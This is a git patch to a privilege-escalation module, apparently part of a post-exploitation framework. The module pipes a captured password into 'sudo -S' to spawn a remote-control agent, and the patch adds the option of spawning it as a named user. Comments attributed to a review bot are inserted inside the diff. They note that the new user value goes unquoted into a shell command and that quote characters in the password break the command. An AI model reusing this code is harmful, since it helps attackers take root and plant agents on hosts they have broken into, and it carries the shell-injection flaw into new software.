From e4eec0f3e664872bbc44dc518f97847f2f0c77b7 Mon Sep 17 00:00:00 2001
From: Peter Toth
Date: Sun, 23 Apr 2017 01:15:40 +0200
Subject: [PATCH] Two bugfixes and one new feature
Bug 1: Password could not contain a double quote. This is fixed on line 108
Bug 2: Password could not start with (or possibly contain) an exclamation mark. This is fixed by using single quotes when echoing the password.
Feature: Optionally give a username. If a username is given then the sudo command will request that user's password, and the agent will be spawned using that user.
---
 lib/modules/privesc/multi/sudo_spawn.py | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)
diff --git a/lib/modules/privesc/multi/sudo_spawn.py b/lib/modules/privesc/multi/sudo_spawn.py
index b5f5939..363702f 100644
--- a/lib/modules/privesc/multi/sudo_spawn.py
+++ b/lib/modules/privesc/multi/sudo_spawn.py
@@ -41,6 +41,11 @@ def __init__(self, mainMenu, params=[]):
 'Required' : True,
 'Value' : ''
 },
+ 'User' : {
+ 'Description' : 'Spawn agent as user.',
+ 'Required' : False,
+ 'Value' : ''
+ },
 'Password' : {
 'Description' : 'User password for sudo.',
 'Required' : True,
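Review bot: The new `User` description does not say what an empty value means, and `Password` ('User password for sudo.') is now ambiguous about whose password is expected. Under a default sudoers policy `sudo -u` still prompts for the invoking user's password rather than the target user's (unless `targetpw` or `runaspw` is set), which does not match what the commit message describes. Suggested wording: `'Description' : 'Optional user to run the agent as (sudo -u); empty uses the sudo default.'`, with the `Password` description stating that it is the password sudo prompts for. The options dict starts and ends outside the hunk.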
@@ -98,11 +103,16 @@ def generate(self):
 return ""
 else:
+ user = self.options['User']['Value']
 password = self.options['Password']['Value']
+ password = password.replace('"', '\\"')
 launcher = launcher.replace('"', '\\"')
 launcher = launcher.replace('echo', '')
 parts = launcher.split("|")
 launcher = "python -c %s" % (parts[0])
- script = 'import subprocess; subprocess.Popen("echo \\"%s\\" | sudo -S %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % (password, launcher)
+ script = 'import subprocess; subprocess.Popen("echo \'%s\' | sudo -S -u %s %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % (password, user, launcher)
+ if not user:
+ script = 'import subprocess; subprocess.Popen("echo \'%s\' | sudo -S %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % (password, launcher)
+
 return script
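Review bot: Switching the echo argument to single quotes trades one unsupported character for another: a password containing `'` now terminates the single-quoted string early, where the old double-quoted form appears to have accepted it, and a backslash can still be consumed by the Python string literal that the one-liner embeds. `User` is interpolated into the `shell=True` command with no quoting or validation either. A comment where the string is built should state these limits, e.g. `# password is single-quoted for sh; values containing ' or \ are unsupported, and user must be a plain account name`. The cleartext password also ends up in the argv of the spawned shell, so process-creation logging on the host records it together with the `echo … | sudo -S` pipeline. generate() starts outside the hunk.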